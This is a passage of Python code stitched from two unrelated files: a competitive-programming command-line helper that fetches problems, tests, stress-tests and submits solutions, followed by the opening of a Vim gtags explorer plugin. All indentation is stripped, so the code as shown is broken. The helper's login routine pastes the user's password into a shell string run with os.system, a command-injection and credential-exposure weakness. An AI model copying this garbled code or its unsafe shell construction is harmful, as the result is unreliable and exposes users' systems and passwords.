if problem['status'] == 'ok':
# print('ok')
try :
alphabet = problem['result']['context']['alphabet']
except :
alphabet = ''
problem_name = problem['result']['name']
problem_name = alphabet + '-'+problem_name
# print(problem_name)
if not os.path.isdir(problem_name):
os.mkdir(problem_name)
try:
result = f"\tFetched '{problem_name}' Successfully"
testcases = problem['result']['tests']
# print(testcases)
# if not os.path.isdir(problem_name):
# os.mkdir("'"+problem_name+"'"+'/test')
base = os.getcwd()
path = os.path.join(base,problem_name,"")
info = '{"name" : "$NAME" , "url" : "$URL" }'
info = info.replace('$NAME',problem_name)
info = info.replace('$URL',url)
with open(path+'.info','w') as f:
f.write(info)
# print(path)
if not os.path.isdir(path+"testcases"):
os.mkdir(path+"testcases")
path = os.path.join(path,'testcases')
no = 1
for case in testcases:
# print(case)
fileName_in = 'Sample-'+str(no).zfill(2)+'.in'
fileName_out = 'Sample-'+str(no).zfill(2)+'.out'
# print(fileName_in)
no += 1
with open(os.path.join(path,fileName_in),'w') as fin:
fin.write(case['input'])
with open(os.path.join(path,fileName_out) ,'w') as fout:
fout.write(case['output'])
cprint(result,'green')
except Exception as e:
print(e)
else :
result = "Wrong url."
                cprint(result,'red')
cprint('-'*55,'magenta')
except Exception as e:
print('-'*55)
# print(e)
cprint("Sorry Can't Fetch.",'red')
class Cp_login:
def login(self):
try :
cprint(' '*17+'...Log In Service...'+' '*17,'blue')
cprint('Enter judge link : ','cyan',end='')
oj = input()
cprint('Enter your username : ','cyan',end='')
username = input()
password = getpass.getpass(prompt='Enter your password : ')
cmd = "USERNAME=$USERNAME PASSWORD=$PASS oj-api login-service " + oj + '> .status'
cmd = cmd.replace("$USERNAME",username)
cmd = cmd.replace("$PASS",password)
# print(cmd)
os.system(cmd)
with open('.status','r') as f:
cp = f.read()
cp = json.loads(cp)
if cp["result"]['loggedIn']:
cprint("Logged in successfully....",'green')
else :
cprint("Login failed.",'red')
os.remove('.status')
except Exception as e:
# print(e)
cprint("Login failed. (Sad)",'red')
pass
class Cp_Test:
def test_it(self, file_name):
try :
pt='-'*20+file_name+'-'*20
cprint(pt,'magenta')
pt = (' '*17+"...Testing...")
print(clr(pt,'blue'))
cmd = "g++ "+file_name+" && oj t"
# cmd = 'g++ '+file_name+' -o a.out'
os.system(cmd)
# cmd_all =[['g++',file_name,'-o','a.out'] , ['oj','t']]
# cmd_all =[['oj','t']]
# print(cmd)
# for i in cmd_all:
# cp = subprocess.run(i, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# result = cp.stderr
# result = result.replace('test failed',clr('test failed','red'))
# result = result.replace('WA',clr('WA','red'))
# result = result.replace('AC',clr('AC','green'))
# print(result)
pt = ('-'*20+'-'*len(file_name)+'-'*20)
cprint(pt,'magenta')
except Exception as e:
print(e)
cprint("Got some error. :(",'red')
def find_files(self,file_name=''):
file_list = []
# print(file_name)
supported_ext = ['cpp','py']
# print(os.getcwd)
for file in os.listdir(os.getcwd()):
try :
ext = file.rsplit(sep='.',maxsplit=1)
for i in supported_ext:
if ext[1] == i:
if file_name in file:
file_list.append(file)
except:
pass
# print(file_list)
sz = len(file_list)
if sz == 1:
self.test_it(file_list[0])
elif sz > 1:
no = 1
cprint("All the available files are given below.\n",'yellow')
for file in file_list:
pt = (' '*4+str(no)+') '+file)
cprint(pt,'blue')
no += 1
cprint(' '*4+'0) Cancel operation','red')
print()
while True:
cprint("Select the file index : ",'cyan',end='')
index = int(input())
if index == 0:
cprint("Testing operation cancelled.",'red')
break
elif index < no:
self.test_it(file_list[index-1])
break
else:
cprint("You have entered the wrong index.Please try again.",'red')
else :
cprint("NO FILE FOUND :(",'red')
class Cp_Submit:
def submit_it(self,file_name):
try :
with open('.info','r') as f:
info = f.read()
info = json.loads(info)
problem_name = info['name']
url = info['url']
except :
cprint("Enter the problem url : ",'cyan',end='')
url = input()
problem_name = url
pt = '-'*20+'Problem Description'+'-'*20
cprint(pt,'magenta')
cprint(' '*4+'Problem : ','yellow',end='')
cprint(problem_name,'green')
cprint(' '*4+'Problem url: ','yellow',end='')
cprint(url,'green')
cprint(' '*4+'File name: ','yellow',end='')
cprint(file_name,'green')
cprint('-'*len(pt),'magenta')
cprint('Enter (y/n) to confirm : ','yellow',attrs=['bold'],end='')
x = input()
        if x.lower() == 'y' or x.lower() == 'yes':
cprint('Submitting...','green')
cmd = 'oj submit --wait=0 --yes $URL $FILENAME'
cmd = cmd.replace('$URL',url)
cmd = cmd.replace('$FILENAME',file_name)
os.system(cmd)
else :
cprint('Submitting Cancelled.','red')
def find_files(self,file_name=''):
cprint(' '*17+'...Submitting Problem...'+'\n','blue')
file_list = []
# print(f'FIle name is {file_name}')
supported_ext = ['cpp','py']
for file in os.listdir(os.getcwd()):
try :
ext = file.rsplit(sep='.',maxsplit=1)
for i in supported_ext:
if ext[1] == i:
if file_name in file:
file_list.append(file)
except:
pass
# print(file_list)
sz = len(file_list)
if sz == 1:
self.submit_it(file_list[0])
elif sz > 1:
no = 1
cprint("All the available files are given below.\n",'yellow')
for file in file_list:
pt = (' '*4+str(no)+') '+file)
cprint(pt,'blue')
no += 1
cprint(' '*4+'0) Cancel operation','red')
print()
while True:
cprint("Select the file number : ",'cyan',end='')
index = int(input())
if index == 0:
cprint("Submitting operation cancelled.",'red')
break
elif index < no:
self.submit_it(file_list[index-1])
break
else:
cprint("You have entered the wrong index.Please try again.",'red')
else :
cprint("NO FILE FOUND :(",'red')
class Cp_add_test:
@property
def take_input(self):
content = ''
while True:
try :
line = input()
except EOFError:
break
content += line +'\n'
return content
def test_print(self,name,value):
pt = '-'*22+name+'-'*22
cprint(pt,'magenta')
value = value.split(sep='\n')
for x in value:
x = ' '+ x
print(x)
def add_case(self , no = 1,name='Custom-'):
""" function for adding testcases """
try :
pt='-'*20+'-'*10+'-'*20
cprint(pt,'magenta')
pt = (' '*17+"...Adding Testcase..."+'\n')
print(clr(pt,'blue'))
folder_name = 'testcases'
if os.path.isdir(folder_name):
pass
elif os.path.isdir('test'):
folder_name = 'test'
else :
os.mkdir(folder_name)
path_name = os.path.join(os.getcwd(),folder_name)
# print(path_name)
lt = os.listdir(path_name)
# print(lt)
ase = len(lt)
no = int(ase/2)+1
cprint('Enter the input(Press Ctrl+d or Ctrl+z after done):','yellow')
x = self.take_input
cprint('Enter the output(Press Ctrl+d or Ctrl+z after done):','yellow')
y = self.take_input
fileName_in = name+str(no).zfill(2)+'.in'
fileName_out = name+str(no).zfill(2)+'.out'
print()
self.test_print(fileName_in,x)
self.test_print(fileName_out,y)
cprint('-'*55,'magenta')
cprint("Do you want to add this testcase(y/n) :",'cyan',end='')
confirm = input().lower()
positive = ['y','yes']
if confirm in positive:
pass
else :
cprint("Cancelled.",'red')
return
no += 1
with open(os.path.join(path_name,fileName_in),'w') as fin:
fin.write(x)
with open(os.path.join(path_name,fileName_out) ,'w') as fout:
fout.write(y)
            cprint('Testcase added successfully. :D','green',attrs=['bold'])
pt='-'*20+'-'*10+'-'*20
cprint(pt,'magenta')
except:
cprint("Can't add testcase. :( ",'red',attrs=['bold'])
class Cp_bruteforce:
def find_files(self,file_name=''):
file_list = []
# print(f'FIle name is {file_name}')
supported_ext = ['cpp','py']
for file in os.listdir(os.getcwd()):
try :
ext = file.rsplit(sep='.',maxsplit=1)
for i in supported_ext:
if ext[1] == i:
if file_name in file:
file_list.append(file)
except:
pass
# print(file_list)
sz = len(file_list)
if sz == 1:
return (file_list[0],True)
elif sz > 1:
xp = file_name
if xp == '':
xp = 'test'
cprint(' '*17+'...Choose '+xp +' file...'+'\n','blue')
no = 1
cprint("All the available files are given below.\n",'yellow')
for file in file_list:
pt = (' '*4+str(no)+') '+file)
cprint(pt,'blue')
no += 1
cprint(' '*4+'0) Cancel operation','red')
print()
while True:
cprint("Select the file number : ",'cyan',end='')
index = int(input())
if index == 0:
cprint("Bruteforcing operation cancelled.",'red')
return ('Cancelled',False)
break
elif index < no:
return (file_list[index-1],True)
break
else:
cprint("You have entered the wrong index.Please try again.",'red')
else :
cprint("NO FILE FOUND :(",'red')
return ('FILE NOT FOUND',False)
def diff_print(self,name,value):
print(' '+name+' :')
for x in value:
x = ' '+ x
print(x)
def different(self,value,output,expected):
x = output.split('\n')
y = expected.split('\n')
i = value.split('\n')
pt = ' '+'-'*5+'Problem Found'+'-'*5
cprint(pt,'yellow')
# print('Input :')
# print(value)
self.diff_print('Input',i)
self.diff_print('Output',x)
self.diff_print('Expected',y)
# print('Output :')
# print(output)
# print("Expected :")
# print(expected)
print(" Difference :")
for wx,wy in zip_longest(x,y,fillvalue=''):
print(' ',end='')
for o , e in zip_longest(wx,wy,fillvalue=''):
if(o == e):
cprint(o,'green',end='')
else :
cprint(o,'red',end='')
cprint(e,'yellow',end='')
print()
cprint(' '+'-'*(len(pt)-2),'yellow')
def sub_process(self,cmd,value,iput):
x = subprocess.Popen(cmd,stdin=subprocess.PIPE,stdout=subprocess.PIPE)
# print('here')
with x.stdin as f:
if iput:
f.write(value.encode())
result = (x.communicate()[0]).decode('utf-8')
# print(result)
return (result,False)
def cmd_manager(self,file_name,value,ext,iput = True):
pass
if ext == 'py':
cmd = ['python3',file_name]
elif ext == 'cpp':
ext = file_name.rsplit(sep='.',maxsplit=1)
cmd = './'+ext[0]
cmd = [cmd]
else:
cprint('command manager failed.','red')
return ''
# print(cmd)
return self.sub_process(cmd,value,iput)[0]
    def add_case(self ,x,y, no = 1,name='Generated-'):
""" function for adding testcases """
try :
test_folder = 'testcases'
if os.path.isdir('testcases'):
test_folder = 'testcases'
elif os.path.isdir('test'):
test_folder = 'test'
else :
os.mkdir('testcases')
path_name = os.path.join(os.getcwd(),test_folder)
# print(path_name)
lt = os.listdir(path_name)
# print(lt)
ase = len(lt)
no = int(ase/2)+1
fileName_in = name+str(no).zfill(2)+'.in'
fileName_out = name+str(no).zfill(2)+'.out'
# print(fileName_in)
no += 1
with open(os.path.join(path_name,fileName_in),'w') as fin:
fin.write(x)
with open(os.path.join(path_name,fileName_out) ,'w') as fout:
fout.write(y)
            cprint('Testcase added successfully. :D','green',attrs=['bold'])
except:
cprint("Can't add testcase. :( ",'red',attrs=['bold'])
def run(self):
brute_file = self.find_files('brute')
# print(brute_file)
if brute_file[1] == False:
return
# print(brute_file[0])
gen_file = self.find_files('gen')
# print(gen_file)
# print(gen_file[1])
if gen_file[1] == False:
return
test_file = self.find_files('')
if test_file[1] == False:
return
test_file = test_file[0]
brute_file = brute_file[0]
gen_file = gen_file[0]
# print(test_file)
cprint('How many times do you want to stress? : ','cyan',end ='')
no = int(input())
if no < 1:
cprint('You want to bruteforce test less than 1 time? Seriously man? (-_-)','red')
return
# testing....
print()
brute_ext = brute_file.rsplit(sep='.',maxsplit=1)[1]
gen_ext = gen_file.rsplit(sep='.',maxsplit=1)[1]
test_ext = test_file.rsplit(sep='.',maxsplit=1)[1]
# print(brute_ext,gen_ext,test_ext)
if brute_ext == 'cpp':
# print('cpp = ',brute_file)
ext = brute_file.rsplit(sep='.',maxsplit=1)[0]
cmd = "g++ "+brute_file+" -o "+ext
with tqdm(total=1.0,desc=brute_file+' compiling',initial=.25) as pbar:
os.system(cmd)
pbar.update(.75)
print()
if gen_ext == 'cpp':
# print('cpp = ',gen_file)
ext = gen_file.rsplit(sep='.',maxsplit=1)[0]
cmd = "g++ "+gen_file+" -o "+ext
with tqdm(total=1.0,desc=gen_file+' compiling',initial=.25) as pbar:
os.system(cmd)
pbar.update(.75)
print()
if test_ext == 'cpp':
# print('cpp = ',test_file)
ext = test_file.rsplit(sep='.',maxsplit=1)[0]
cmd = "g++ "+test_file+" -o "+ext
with tqdm(total=1.0,desc=test_file+' compiling',initial=.25) as pbar:
os.system(cmd)
pbar.update(.75)
print()
digit = len(str(no))
print()
st = -1.0
pt='-'*20+test_file+'-'*20
cprint(pt,'magenta')
pt = (' '*13+"...Bruteforcing...")
print()
cprint(f' # Test File : ','yellow',end='')
cprint(f'{test_file}','cyan')
cprint(f' # Brute File : ','yellow',end='')
cprint(f'{brute_file}','cyan')
cprint(f' # Gen File : ','yellow',end='')
cprint(f'{gen_file}','cyan')
cprint(f' # Stress : ','yellow',end='')
cprint(f'{no} ','cyan',end=' ')
if no < 2:
cprint('time','cyan')
else :
cprint('times','cyan')
print()
cprint(pt,'blue')
print()
for i in range(no):
iput = self.cmd_manager(gen_file,'',gen_ext,False)
# print(iput)
ans = self.cmd_manager(brute_file,iput,brute_ext,True)
# print(ans)
t = time.time()
result = self.cmd_manager(test_file,iput,test_ext,True)
# print(ans)
t = time.time() - t
cprint(' * '+str(i+1).zfill(digit)+') ','yellow',end='')
# if(iput == '4\n'):
# print(ans)
# print(result)
# break
if t > st:
st = t
if result == ans:
cprint('Passed...','green',end=' ')
else :
cprint('Failed...','red',end=' ')
cprint(f'[ Time : {t:.4f} sec ]','cyan')
self.different(iput,result,ans)
print()
cprint(' # Failed. :(','red')
with open('hack.in','w') as f:
f.write(iput)
with open('hack.out','w') as f:
f.write(ans)
print()
cprint('Do you want to add this case to your testcases list? (Y/N) : ','cyan',attrs = ['bold'],end='')
want = input()
want = want.lower()
if want == 'y' or want =='yes':
# cprint('Test case added successfully.','green')
self.add_case(iput,ans)
return
cprint(f'[ Time : {t:.4f} sec ]','cyan')
print()
cprint(f' # Slowest : {st:.4f} sec.','blue')
cprint(f' # Accepted.','green')
print()
pt='-'*20+'-'*len(test_file)+'-'*20
cprint(pt,'magenta')
class Cp_setup:
def sub_process(self,cmd):
try:
x = subprocess.Popen(cmd,stdout=subprocess.PIPE)
# print('here')
result = (x.communicate()[0]).decode('utf-8')
except :
result = ''
# print(result)
return (result)
def gen_py(self):
try :
case_folder = ''
if os.path.isdir('testcases'):
case_folder = 'testcases'
elif os.path.isdir('test'):
case_folder = 'test'
else :
                cprint(" testcases folder is not available, can't generate gen.py file. :(",'red')
return
cmd = ['python3','-m','tcgen','--path',case_folder]
result = self.sub_process(cmd)
# print('result is \n',result)
if result == '':
                cprint(" Can't generate the gen file automatically. Sorry sir. :( ",'red')
return
with open('gen.py','w') as f:
f.write(result)
            cprint(' gen.py generated successfully, sir. :D','green')
except Exception as e:
print(e)
            cprint(" Sorry sir, can't generate the gen file automatically. ")
def template(self,file_path='',file_name='sol.cpp',parsingMode=False):
try :
# print('Genarating template')
from settings.compiler import template_path , coder_name
from system.get_time import digital_time
# print(template_path)
ext = file_name.rsplit(sep='.',maxsplit=1)
if(len(ext) == 1) :
ext = 'cpp'
file_name = file_name+'.cpp'
else :
ext = ext[1]
if ext == 'cpp':
path = template_path['c++']
elif ext == 'py':
path = template_path['python']
else :
                cprint(' File format not supported. Currently only C++ and Python are supported.','red')
                return
try :
# path = f"'{path}'"
# path = 't.cpp'
fName = file_name
info_path = '.info'
if file_path != '':
file_name = os.path.join(file_path,file_name)
info_path = os.path.join(file_path,info_path)
if os.path.isfile(file_name):
if parsingMode:
return
                    cprint(f" {fName} already exists, do you want to replace it? (Y/N) :",'cyan',end='')
want = input()
want = want.lower()
if want !='y' and want!='yes':
cprint(f" {fName} creation cancelled.",'red')
return
info_ase = False
if os.path.isfile(info_path):
info_ase = True
if path == '$DEFAULT':
if ext == 'py':
if info_ase:
code = get_template('py_template_info.txt')
else :
code = get_template('py_template.txt')
else :
if info_ase:
code = get_template('cpp_template_info.txt')
else :
code = get_template('cpp_template.txt')
else :
with open(path,'r') as f:
code = f.read()
problem_name = '-X-'
problem_url = '-X-'
problem_timeLimit = 'NULL'
problem_memoryLimit = 'NULL'
try :
if info_ase :
with open(info_path,'r') as f:
info = f.read()
info = json.loads(info)
problem_name = info['name']
problem_url = info['url']
problem_timeLimit = info['timeLimit']
problem_memoryLimit = info['memoryLimit']
except :
pass
code = code.replace('$%CODER%$',coder_name)
code = code.replace('$%DATE_TIME%$',digital_time())
code = code.replace('$%PROBLEM_NAME%$',problem_name)
code = code.replace('$%PROBLEM_URL%$',problem_url)
code = code.replace('$%TIMELIMIT%$',problem_timeLimit)
code = code.replace('$%MEMORYLIMIT%$',problem_memoryLimit)
with open(file_name,'w') as f:
f.write(code)
# print(code)
if parsingMode == False:
                    cprint(f' {fName} created successfully, sir. :D','green')
except Exception as e:
# cprint(e,'red')
cprint("template path doesn't exist. Sorry sir.",'red')
cprint("check settings/compiler.py to change your template path :D .",'yellow')
return
except Exception as e:
cprint(e,'red')
            cprint("Can't generate template.",'red')
return
def brute(self,file_name='brute.cpp'):
try :
if os.path.isfile(file_name):
                cprint(f" {file_name} already exists, do you want to replace it? (Y/N) :",'cyan',end='')
want = input()
want = want.lower()
if want !='y' and want!='yes':
cprint(f" {file_name} creation cancelled.",'red')
return
with open(file_name,'w') as f:
f.write('/* Bruteforce */\n')
cprint(f' {file_name} created successfully, sir. :D','green')
except :
            cprint(f" Can't create {file_name}",'red')
def setup(self,t_name = 'sol.cpp',brute_name='brute.cpp'):
if not os.path.isfile(t_name) :
self.template()
else :
cprint(f" {t_name} exists.",'green')
if not os.path.isfile(brute_name):
self.brute()
else :
cprint(f" {brute_name} exists.",'green')
self.gen_py()
class Cp_contest():
def fetch_problem(self,url = ''):
try :
cmd = 'oj-api get-problem ' + url
cmd = list(cmd.split())
cp = subprocess.run(cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
problem = json.loads(cp.stdout)
# with open('problem.json','w') as f:
# f.write(cp.stdout)
if problem['status'] == 'ok':
# print('ok')
try :
alphabet = problem['result']['context']['alphabet']
except:
alphabet = ''
problem_name = problem['result']['name']
problem_name = alphabet + '-'+problem_name
# print(problem_name)
if not os.path.isdir(problem_name):
os.mkdir(problem_name)
try:
                    result = f" * Fetched '{problem_name}' Successfully"
testcases = problem['result']['tests']
# print(testcases)
# if not os.path.isdir(problem_name):
# os.mkdir("'"+problem_name+"'"+'/test')
base = os.getcwd()
path = os.path.join(base,problem_name,"")
info = '{"name" : "$NAME" , "url" : "$URL" }'
info = info.replace('$NAME',problem_name)
info = info.replace('$URL',url)
with open(path+'.info','w') as f:
f.write(info)
# print(path)
if not os.path.isdir(path+"testcases"):
os.mkdir(path+"testcases")
path = os.path.join(path,'testcases')
no = 1
for case in testcases:
# print(case)
fileName_in = 'Sample-'+str(no).zfill(2)+'.in'
fileName_out = 'Sample-'+str(no).zfill(2)+'.out'
# print(fileName_in)
no += 1
with open(os.path.join(path,fileName_in),'w') as fin:
fin.write(case['input'])
with open(os.path.join(path,fileName_out) ,'w') as fout:
fout.write(case['output'])
cprint(result,'green')
except Exception as e:
print(e)
else :
result = "Wrong url."
                cprint(result,'red')
except Exception as e:
print('-'*55)
# print(e)
cprint("Sorry Can't Fetch.",'red')
def parse_contest(self,url=''):
try :
cprint(' '*17+'...Parsing Contest...'+' '*17,'blue')
if url == '':
cprint('Enter the url : ','cyan',end='')
url = input()
cprint('-'*55,'magenta')
# os.system(cmd)
t = time.time()
cmd = 'oj-api get-contest ' + url
cmd = list(cmd.split())
cp = subprocess.run(cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
contest = json.loads(cp.stdout)
# with open('problem.json','w') as f:
# f.write(cp.stdout)
result = "\tFetched Contest info..."
if contest['status'] == 'ok':
cprint(result,'green')
else :
                cprint("Contest can't be fetched. Sorry sir. :( ",'red')
return
# print(contest)
path = os.getcwd()
# print(path)
contest_name = contest['result']['name']
cprint(f' # Contest name : {contest_name}','green')
if not os.path.isdir(contest_name):
os.mkdir(contest_name)
# cprint('Contest folder created.','green')
print()
os.chdir(os.path.join(path,contest_name))
# print(os.getcwd())
problem = contest['result']['problems']
with open('t.json','w') as f:
f.write(str(contest))
for key in problem:
url = key['url']
# print(url)
# Cp_Problem.fetch_problem(url)
self.fetch_problem(url=url)
os.chdir(path)
# print(os.getcwd())
print()
cprint(" # Done. :D",'green')
cprint(f" # Time taken {time.time()-t:.4f} sec.",'blue')
cprint('-'*55,'magenta')
except Exception as e:
cprint(e,'red')
class Cp_ext:
HOST = '127.0.0.1'
PORT = competitive_companion_port
def template(self,file_path,file_name='sol.cpp'):
try :
obj_template = Cp_setup()
obj_template.template(file_path,file_name,parsingMode=True)
return
except Exception as e:
return
def rectify(self,s):
try:
i = s.find('{')
s = s[i:]
return s
except Exception as e:
return ''
def create(self,problem , cnt=0):
# print("here")
try :
problem = self.rectify(problem)
dic = json.loads(problem)
# cprint(dic,'yellow')
problem_name = dic['name']
try :
contest_name = dic['group']
except :
contest_name = 'NULL'
url = dic['url']
problem_timeLimit = 'NULL'
problem_memoryLimit = 'NULL'
try :
problem_timeLimit = str(dic['timeLimit']) + ' ms'
problem_memoryLimit = str(dic['memoryLimit']) + ' MB'
except Exception as e:
cprint(e,'red')
pass
# cprint(f'{problem_name} : {contest_name} : {url} ','cyan')
base = os.getcwd()
base_name = os.path.basename(base)
# cprint(f'{base_name}','cyan')
contest_path = os.path.join(base,contest_name)
# cprint(f'{contest_path}','yellow')
# cprint(f'cnt = {cnt}','yellow')
if base_name != contest_name and contest_name != 'NULL':
if cnt == 0:
if not os.path.isdir(contest_name):
os.mkdir(contest_name)
cprint(f" Folder {contest_name} is created.",'blue')
info = '{"contest_name" : "$CONTEST" , "url" : "$URL"}'
info = info.replace('$CONTEST',contest_name)
info = info.replace('$URL',url)
with open(os.path.join(contest_path,'.info'),'w') as f:
f.write(info)
cprint(f" All the problems will be parsed into '{contest_name}' folder.\n",'magenta')
os.chdir(contest_path)
# cprint(os.getcwd(),'red')
if not os.path.isdir(problem_name):
os.mkdir(problem_name)
# print("problem created")
info = '{"name" : "$NAME" , "url" : "$URL","timeLimit" : "$timeLimit" , "memoryLimit":"$memoryLimit"}'
info = info.replace('$NAME',problem_name)
info = info.replace('$URL',url)
info = info.replace('$memoryLimit',problem_memoryLimit)
info = info.replace('$timeLimit',problem_timeLimit)
path = os.path.join(os.getcwd(),problem_name,"")
# print(path)
with open(path+'.info','w') as f:
f.write(info)
if parse_problem_with_template:
self.template(path)
testcases = dic['tests']
# print(testcases)
# return
no = 1
if not os.path.isdir(path+"testcases"):
os.mkdir(path+"testcases")
path = os.path.join(path,'testcases')
for case in testcases:
# print(case)
fileName_in = 'Sample-'+str(no).zfill(2)+'.in'
fileName_out = 'Sample-'+str(no).zfill(2)+'.out'
# print(fileName_in)
no += 1
with open(os.path.join(path,fileName_in),'w') as fin:
fin.write(case['input'])
with open(os.path.join(path,fileName_out) ,'w') as fout:
fout.write(case['output'])
# cprint(result,'green')
# print(info)
cprint(f' {problem_name} fetched successfully.','green')
os.chdir(base)
except Exception as e:
cprint(e,'red')
cprint("Can't fetch.",'red')
def listen(self):
cprint(' '*17+'...Parsing Problem...'+' '*17,'blue')
print()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((self.HOST,self.PORT))
cprint(" Listening (Click competitive companion extension)....",'yellow')
print()
timeout = 60
cnt = 0
ok = True
while ok:
try :
s.listen()
s.settimeout(timeout)
timeout = 2
conn , addr = s.accept()
with conn:
# cprint("Connected...",'green')
problem_json = ''
while True:
data = conn.recv(1024)
result = (data.decode('utf-8'))
# result = self.rectify(result)
if not data :
# cprint(problem_json,'cyan')
if problem_json == '':
break
t = threading.Thread(target=self.create,args=(problem_json,cnt))
t.start()
cnt += 1
break
else:
problem_json += result
pass
except :
ok = False
            print()
            cprint(f' # Total {cnt} problem(s) fetched.','blue')
help_keys = ['-h','help']
def help():
"""All the available arguments are listed here"""
pt = '-'*18+"cp command arguments"+'-'*18
cprint(pt,'magenta')
print()
cprint(' -> parse : ','yellow',end='')
cprint('To parse problem or contest via competitive companion extension','cyan')
cprint(' -> listen : ','yellow',end='')
cprint('To parse problem or contest via competitive companion extension','cyan')
cprint(' -> test : ','yellow',end='')
cprint('To test code against testcases','cyan')
cprint(' -> add : ','yellow',end='')
cprint('To add testcase','cyan')
cprint(' -> brute : ','yellow',end='')
cprint('To bruteforce solution','cyan')
cprint(' -> gen : ','yellow',end='')
    cprint('To generate a testcase generator','cyan')
cprint(' -> setup : ','yellow',end='')
    cprint('To generate sol.cpp, brute.cpp and a testcase generator','cyan')
cprint(' -> -t "filename": ','yellow',end='')
cprint('To generate "filename" from template','cyan')
cprint(' -> login: ','yellow',end='')
cprint('To login into online judge','cyan')
cprint(' -> submit: ','yellow',end='')
cprint('To submit problem','cyan')
cprint(' -> problem : ','yellow',end='')
cprint('To parse problem manually','cyan')
cprint(' -> contest : ','yellow',end='')
cprint('To parse contest manually','cyan')
print()
cprint('-'*len(pt),'magenta')
def cp_manager(msg):
if 'parse' in msg or 'listen' in msg:
obj = Cp_ext()
obj.listen()
elif 'problem' in msg:
obj = Cp_Problem()
obj.fetch_problem()
elif 'submit' in msg:
msg = msg.replace('submit','')
msg = msg.replace(' ','')
obj = Cp_Submit()
obj.find_files(msg)
elif '-t' in msg or 'template' in msg:
msg = msg.replace('-t','')
msg = msg.replace('template','')
msg = msg.split()
if (len(msg)) == 0:
msg = 'sol.cpp'
else :
msg = msg[0]
obj = Cp_setup()
obj.template(file_name=msg)
elif 'contest' in msg:
obj = Cp_contest()
obj.parse_contest()
elif 'login' in msg:
obj = Cp_login()
obj.login()
elif 'add' in msg:
obj = Cp_add_test()
obj.add_case()
elif 'test -oj' in msg:
msg = msg.replace('test -oj','')
msg = msg.replace(' ','')
obj = Cp_Test()
obj.find_files(msg)
elif 'test' in msg:
msg = msg.replace('test','')
msg = msg.replace(' ','')
obj = Cp_my_tester()
# obj.TLE = 1
obj.find_files(msg)
elif 'setup' in msg:
obj = Cp_setup()
obj.setup()
elif 'brute' in msg:
obj = Cp_bruteforce()
obj.run()
elif 'gen' in msg:
obj = Cp_setup()
obj.gen_py()
elif if_run_type(msg):
pass
elif msg in help_keys:
help()
else :
cprint('Arguments Error','red')
help()
def if_cp_type(msg):
# print(msg)
for key in cp_keys:
if key in msg:
msg = msg.replace(key,'')
cp_manager(msg.lower())
return True
return False
if __name__ == "__main__":
# obj = Cp_Problem()
# Cp_Problem.fetch_problem()
# obj = Cp_Submit()
# obj.find_files()
# Cp_login.login()
obj = Cp_add_test()
obj.add_case()
# obj = Cp_Test()
# obj.find_files()
# cprint("Enter something for testing purpose : ",'cyan',end='')
# x = input()
# cprint(x,'blue')
|
gtagsExpl.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import vim
import re
import os
import os.path
import shutil
import itertools
import subprocess
import sys
import threading
from functools import partial
from .utils import *
from .explorer import *
from .manager import *
if sys.version_info >= (3, 0):
import queue as Queue
else:
import Queue
#*****************************************************
# GtagsExplorer
#*****************************************************
class GtagsExplorer(Explorer):
def __init__(self):
self._executor = []
self._pattern_regex = []
if os.name == 'nt':
self._cd_option = '/d '
else:
self._cd_option = ''
self._root_markers = lfEval("g:Lf_RootMarkers")
self._db_location = os.path.join(lfEval("g:Lf_CacheDirectory"),
'.LfCache',
'gtags')
self._store_in_project = lfEval("get(g:, 'Lf_GtagsStoreInProject', 0)") == '1'
self._store_in_rootmarker = lfEval("get(g:, 'Lf_GtagsStoreInRootMarker', 0)") == '1'
self._project_root = ""
self._gtagslibpath = []
self._result_format = None
self._last_result_format = None
self._evalVimVar()
self._has_nvim = lfEval("has('nvim')") == '1'
self._db_timestamp = 0
self._last_command = ""
self._content = []
self._task_queue = Queue.Queue()
self._worker_thread = threading.Thread(target=self._processTask)
self._worker_thread.daemon = True
self._worker_thread.start()
def __del__(self):
self._task_queue.put(None)
self._worker_thread.join()
def _processTask(self):
while True:
try:
task = self._task_queue.get()
if task is None:
break
task()
except Exception as e:
print(e)
def setContent(self, content):
if self._last_command == "--all":
self._content = content
def getContent(self, *args, **kwargs):
arguments_dict = kwargs.get("arguments", {})
if "--recall" in arguments_dict:
return []
if vim.current.buffer.name:
filename = os.path.normpath(lfDecode(vim.current.buffer.name))
else:
filename = os.path.join(os.getcwd(), 'no_name')
if "--gtagsconf" in arguments_dict:
self._gtagsconf = arguments_dict["--gtagsconf"][0]
if "--gtagslabel" in arguments_dict:
self._gtagslabel = arguments_dict["--gtagslabel"][0]
if self._gtagsconf == '' and os.name == 'nt':
self._gtagsconf = os.path.normpath(os.path.join(self._which("gtags.exe"), "..", "share", "gtags", "gtags.conf")).join('""')
if "--gtagslibpath" in arguments_dict:
self._gtagslibpath = [os.path.abspath(os.path.expanduser(p)) for p in arguments_dict["--gtagslibpath"]]
for i in self._gtagslibpath:
if not os.path.exists(i):
print("`%s` does not exist!" % i)
else:
self._gtagslibpath = []
if "--update" in arguments_dict:
self._evalVimVar()
if "--accept-dotfiles" in arguments_dict:
self._accept_dotfiles = "--accept-dotfiles "
if "--skip-unreadable" in arguments_dict:
self._skip_unreadable = "--skip-unreadable "
if "--skip-symlink" in arguments_dict:
skip_symlink = arguments_dict["--skip-symlink"]
self._skip_symlink = "--skip-symlink%s " % ('=' + skip_symlink[0] if skip_symlink else "")
self.updateGtags(filename, single_update=False, auto=False)
return
elif "--remove" in arguments_dict:
self._remove(filename)
return
if "--path-style" in arguments_dict:
path_style = "--path-style %s " % arguments_dict["--path-style"][0]
else:
path_style = ""
auto_jump = False
self._last_result_format = self._result_format
self._result_format = None
if "-d" in arguments_dict:
pattern = arguments_dict["-d"][0]
pattern_option = "-d -e %s " % pattern
if "--auto-jump" in arguments_dict:
auto_jump = True
elif "-r" in arguments_dict:
pattern = arguments_dict["-r"][0]
pattern_option = "-r -e %s " % pattern
if "--auto-jump" in arguments_dict:
auto_jump = True
elif "-s" in arguments_dict:
pattern = arguments_dict["-s"][0]
pattern_option = "-s -e %s " % pattern
elif "-g" in arguments_dict:
pattern = arguments_dict["-g"][0]
pattern_option = "-g -e %s " % pattern
elif "--by-context" in arguments_dict:
pattern = lfEval('expand("<cword>")')
pattern_option = '--from-here "%d:%s" %s ' % (vim.current.window.cursor[0], vim.current.buffer.name, pattern)
